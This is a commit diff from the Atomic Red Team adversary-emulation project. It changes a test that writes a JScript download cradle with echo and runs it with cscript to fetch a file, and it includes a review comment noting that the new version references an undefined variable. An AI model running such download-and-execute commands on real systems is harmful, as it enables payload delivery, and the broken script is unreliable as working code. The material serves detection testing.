Generate docs from job=validate_atomics_generate_docs branch=master

CircleCI Atomic Red Team doc generator
2020-03-04 21:35:00 +00:00
parent 75149a7ac0
commit f89552e246
2 changed files with 7 additions and 11 deletions
+2 -4
@@ -242,20 +242,18 @@ Uses cscript //E:jscript to download a file
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
| file_url | URL to retrieve file from | Url | https://www.w3.org/TR/PNG/iso_8859-1.txt|
| out_file | File to download payload to | Path | T1071-Out.txt|
| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
#### Attack Commands: Run with `command_prompt`!
```
echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
```
#### Cleanup Commands:
```
del #{script_file} /F /Q
del #{out_file} /F /Q
```
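Review bot: The regenerated `echo var url = ...` command no longer declares `filename` (the `filename = "#{out_file}"` initialiser and the `out_file` argument are gone), yet it still calls `stream.SaveToFile(filename, 1)`, so the JScript would raise an undefined-identifier error after a successful download instead of writing the file. A test that aborts this way produces no file-write telemetry, which can make a detection look broken or untested when the fault is in the atomic itself. Because this page is generated, the fix belongs in the source atomic definition: either restore `out_file` together with `del #{out_file} /F /Q` in the cleanup, or drop the `ADODB.Stream` save block. The same command appears in the index YAML section of this commit. Separately, the `file_url` default that appears to be the new one uses `https://` with an IP literal, which will probably fail certificate name validation in `MSXML2.ServerXMLHTTP`, so it is worth confirming that the request completes.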
+5 -7
@@ -27961,18 +27961,16 @@ command-and-control:
file_url:
description: URL to retrieve file from
type: Url
default: https://www.w3.org/TR/PNG/iso_8859-1.txt
out_file:
description: File to download payload to
type: Path
default: T1071-Out.txt
default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
executor:
name: command_prompt
elevation_required: false
command: |
echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
cleanup_command: "del #{script_file} /F /Q\ndel #{out_file} /F /Q "
cleanup_command: 'del #{script_file} /F /Q
'
T1032:
technique:
x_mitre_data_sources: